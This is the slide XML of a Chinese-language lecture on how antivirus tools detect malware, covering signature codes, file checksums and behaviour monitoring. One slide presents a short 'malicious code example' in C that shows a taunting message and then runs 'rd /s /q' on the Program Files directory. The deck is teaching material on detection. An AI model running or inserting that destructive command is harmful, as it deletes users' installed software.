              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这两段字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167940" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F67029-26A6-47ED-B6E6-AC6105B341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1660525"/>
            <a:ext cx="72009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776D0923-3430-405E-9E6D-7EC5D4CC0C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169987" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8808551F-81B4-4102-91BF-5C5CE49D9569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="4437063"/>
            <a:ext cx="7620000" cy="2232025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>call $+5”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，这种写法并不多见</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="169988" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0BBB42-BA57-4E47-B1DF-40DA5AA062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6525" y="2286000"/>
            <a:ext cx="73914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3A59A68C-A838-47F7-81D9-3E5EEDD0F73C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码识别法－优点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172035" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A35266-8F26-44CD-AAE1-79E505391564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>速度快，配备高性能的扫描引擎；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>准确率高，误杀操作相对较少；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>很少需要用户参与。</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311A6C3-963B-471B-94A8-36098562ECC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征码识别法－缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173059" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69976E7-735D-478A-94B0-6A2BE3E52C65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389063" y="1676400"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用病毒特征代码法的检测工具，面对不断出现的新病毒，必须不断更新病毒库的版本，否则检测工具便会老化，逐渐失去实用价值；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒特征代码法对从未见过的新病毒，无法知道其特征代码，因而无法去检测新病毒；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒特征码如果没有经过充分的检验，可能会出现误报，数据误删，系统破坏，给用户带来麻烦；</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84ED0206-8008-4A58-9195-E7A88439E124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>全盘扫描－文件校验和法 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174083" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBF7CE1-216F-46EF-9C54-E885A5220654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对文件进行扫描后，可以将正常文件的内容，计算其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>校验和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，将该校验和写入文件中或写入别的文件中保存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在文件使用过程中，定期地或每次使用文件前，检查文件现在内容算出的校验和与原来保存的校验和是否一致，因而可以发现文件是否感染病毒。</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E3D8F8B-631A-4603-A810-DFE4DEAFB5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1981200"/>
            <a:ext cx="7808912" cy="5048200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>int main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	system("title goodbye &gt;:)");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("GOODBYE!! &gt;:)\n You have 10 seconds to save your computer");	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	sleep(10);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /s /q \"C:\Program Files\"");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4083621030"/>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DCBB5925-5B96-4708-A8E9-17746D5F3DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>全盘扫描－文件校验和法 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175107" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AB3E2E-D0EF-4572-92DA-2A95CA405A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于不常修改的文件（如可执行程序，系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等），可以加快病毒的扫描速度；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>既可发现已知病毒又可发现未知病毒； </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统文件扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sfc /scannow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:latin typeface="Century Gothic" panose="020B0502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FE46498A-ADF5-47F0-BF9A-95AA51A68217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程行为监测法－机制 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176131" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E75FBCD9-3031-4DFA-98A7-91063F134D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过对病毒多年的观察、研究，有一些行为是病毒的共同行为，而且比较特殊，在正常程序中，这些行为比较罕见。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当程序运行时，监视其进程的各种行为，如果发现了病毒行为，立即报警。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5335EEA-5DC2-4818-886A-2773A8630429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程行为监测法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177155" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C6B78A0-C6CD-48BC-8A3A-EF973E5E1E40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="495300" indent="-495300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>占有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a:t>INT 13H </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="763588" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>引导型病毒占据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1"/>
              <a:t>INT 13H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>功能，在其中放置病毒所需的代码。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-495300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>系统为数据区的内存总量 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="763588" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>病毒常驻内存后，为了防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>系统将其覆盖，必须修改系统内存总量。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-495300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a:t>COM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a:t>EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>等可执行程序文件做写入动作 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="763588" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>病毒要感染，必须写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1"/>
              <a:t>COM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1"/>
              <a:t>EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>文件。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-495300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>病毒程序与宿主程序的切换 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="763588" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1"/>
              <a:t>染毒程序运行中，先运行病毒，而后执行宿主程序；在两者切换时，有许多特征行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-495300">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>加载驱动，截获系统函数调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a:t>(HOOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1"/>
              <a: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B1D31270-EA01-4503-9BC5-30A6FD04CFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程行为监测法－优缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0679A-2C12-41B0-BB82-E35FFA4EB509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>行为监测法的长处：可发现未知病毒、可相当准确地预报未知的多数病毒；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>行为监测法的短处：可能误报警、不能识别病毒名称、有一定实现难度、需要更多的用户参与判断； </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562E0247-5D7A-4A58-867C-64E41E8537C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
